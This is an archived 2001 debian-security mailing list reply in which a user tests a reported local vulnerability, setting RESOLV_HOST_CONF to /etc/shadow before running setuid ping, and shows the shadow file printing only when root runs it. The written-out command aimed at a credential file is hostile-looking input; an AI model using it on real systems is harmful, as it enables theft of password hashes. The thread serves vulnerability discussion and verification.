Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerabi

To: debian-security@lists.debian.org
Subject: Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerabi
From: bjoern.engels@lanworks.de
Date: Tue, 09 Jan 2001 11:19:41 +0100 (CET)
Message-id: <[🔎] XFMail.20010109111941.bjoern.engels@lanworks.de>
Reply-to: bengels@lanworks.de
In-reply-to: <[🔎] Pine.LNX.4.31.0101081752230.25739-100000@io.88.net>

I tried the exploit on a SuSE 7.0 host,
if root starts ping/traceroute..., the /etc/shadow file is being shown,
if a normal user exports RESOLV_HOST_CONF, nothing unnormal
happens:

bj@spock:~ > ls -l /bin/ping
-rwsr-xr-x   1 root     root          23k Okt  4 12:37 /bin/ping
bj@spock:~ > ldd /bin/ping
        libc.so.6 => /lib/libc.so.6 (0x40021000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)

bj@spock:~ > export RESOLV_HOST_CONF='/etc/shadow'
bj@spock:~ > ping localhost
PING localhost (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=0.189 ms
<-snip->
bj@spock:~ >


spock:~ # export RESOLV_HOST_CONF='/etc/shadow'
spock:~ # ping localhost
/etc/shadow: line 1: bad command `root:blabla:9473:0:10000::::'
<-snip->
/etc/shadow: line 47: bad command `bj:blabla:11194:0:99999:7:0::'
PING localhost (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=0.191 ms 
<-snip->
spock:~ #

Any idea why ? Does the variable not apply for normal users ?

Björn

Reply to:

References:
- Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
  - From: thomas lakofski <thomas@88.net>

Prev by Date: Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
Next by Date: Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
Previous by thread: Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
Next by thread: Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
Index(es):
- Date
- Thread